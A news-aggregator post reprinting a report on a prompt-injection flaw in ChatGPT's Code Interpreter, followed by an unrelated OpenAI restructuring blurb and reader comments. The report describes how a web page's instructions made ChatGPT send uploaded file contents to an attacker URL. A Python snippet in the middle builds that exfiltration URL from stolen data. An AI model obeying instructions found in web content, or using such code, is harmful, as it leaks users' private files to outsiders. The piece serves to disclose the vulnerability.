Arthur T Knackerbracket has processed the following story:
ChatGPT's recently added Code Interpreter makes writing Python code with AI much more powerful, because it actually writes the code and then runs it for you in a sandboxed environment. Unfortunately, this sandboxed environment, which is also used to handle any spreadsheets you want ChatGPT to analyze and chart, is wide open to prompt injection attacks that exfiltrate your data.
Using a ChatGPT Plus account, which is necessary to get the new features, I was able to reproduce the exploit, which was first reported on Twitter by security researcher Johann Rehberger. It involves pasting a third-party URL into the chat window and then watching as the bot interprets instructions on the web page the same way it would interpret commands the user entered.
[...] I tried this prompt injection exploit and some variations on it several times over a few days. It worked a lot of the time, but not always. In some chat sessions, ChatGPT would refuse to load an external web page at all, but then would do so if I launched a new chat.
In other chat sessions, it would give a message saying that it's not allowed to transmit data from files this way. And in yet other sessions, the injection would work, but rather than transmitting the data directly to http://myserver.com/data.php?mydata=[DATA], it would provide a hyperlink in its response and I would need to click that link for the data to transmit.
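The exfiltration step the article describes can be sketched in a few lines: the injected page instructs the model to URL-encode whatever it read from the sandbox and append it as a query parameter on the attacker's URL, so a single GET request (or a clicked hyperlink) leaks the data into the attacker's server logs. This is an illustrative sketch, not the exact injected prompt; the endpoint and parameter name are taken from the article's example URL.

```python
from urllib.parse import quote

# Endpoint and parameter name from the article's example
# (http://myserver.com/data.php?mydata=[DATA]); purely illustrative.
ATTACKER_ENDPOINT = "http://myserver.com/data.php"

def build_exfil_url(stolen_data: str) -> str:
    """Encode sandbox file contents into a query string, as the
    injected instructions ask the model to do."""
    return f"{ATTACKER_ENDPOINT}?mydata={quote(stolen_data)}"

# e.g. the contents of an uploaded .csv read from /mnt/data
url = build_exfil_url("user,password\nalice,hunter2")
print(url)
```

Whether the request fires automatically or the model merely renders the URL as a clickable link, the data leaves the sandbox the moment that URL is fetched.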
I was also able to use the exploit after I'd uploaded a .csv file with important data in it to use for data analysis. So this vulnerability applies not only to code you're testing but also to spreadsheets you might want ChatGPT to use for charting or summarization.
[...] The problem is that, no matter how far-fetched it might seem, this is a security hole that shouldn't be there. ChatGPT should not follow instructions that it finds on a web page, but it does and has for a long time. We reported on ChatGPT prompt injection (via YouTube videos) back in May after Rehberger himself responsibly disclosed the issue to OpenAI in April. The ability to upload files and run code in ChatGPT Plus is new (recently out of beta) but the ability to inject prompts from a URL, video or a PDF is not.
Related Stories
On Wednesday, Reuters reported that OpenAI is working on a plan to restructure its core business into a for-profit benefit corporation, moving away from control by its nonprofit board. The shift marks a dramatic change for the AI company behind ChatGPT, potentially making it more attractive to investors while raising questions about its commitment to sharing the benefits of advanced AI with "all of humanity," as written in its charter.
A for-profit benefit corporation is a legal structure that allows companies to pursue both financial profits and social or environmental goals, ostensibly balancing shareholder interests with a broader mission to benefit society. It's an approach taken by some of OpenAI's competitors, such as Anthropic and Elon Musk's xAI.
[...] Bloomberg reports that OpenAI is discussing giving Altman a 7 percent stake, though the exact details are still under negotiation. This represents a departure from Altman's previous stance of not taking equity in the company, which he had maintained was in line with OpenAI's mission to benefit humanity rather than individuals.
[...] The proposed restructuring also aims to remove the cap on returns for investors, potentially making OpenAI more appealing to venture capitalists and other financial backers. Microsoft, which has invested billions in OpenAI, stands to benefit from this change, as it could see increased returns on its investment if OpenAI's value continues to rise.
(Score: 4, Informative) by ElizabethGreene on Friday November 17 2023, @04:42PM
You should check the Microsoft chat AI options for this problem too. They have a fat bounty program for AI vulnerabilities.
(Score: 5, Funny) by Rosco P. Coltrane on Friday November 17 2023, @04:47PM (2 children)
It randomly clicks on webpages and interprets whatever it finds there at face value, like any dumbass human internet user.
(Score: 2, Insightful) by anubi on Friday November 17 2023, @07:37PM (1 child)
And, like a human, it's not consistent.
Oh, troubleshooting fun ahead.
"Prove all things; hold fast that which is good." [KJV: I Thessalonians 5:21]
(Score: 2) by maxwell demon on Sunday November 19 2023, @04:03PM
And just as they do with humans, they probably will try to fix it by giving the AI security training.
Which probably will be just as effective as for humans.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 4, Touché) by DadaDoofy on Friday November 17 2023, @06:36PM (1 child)
It's funny how so many people latch on to the "intelligence" part while almost ignoring the "artificial" part. Taken at face value, if the intelligence is artificial, the thing behind this carefully crafted high tech facade is quite likely to be pretty dumb.
(Score: 2) by darkfeline on Friday November 17 2023, @11:04PM
You say that as if humans aren't vulnerable to scams or phishing.
Join the SDF Public Access UNIX System today!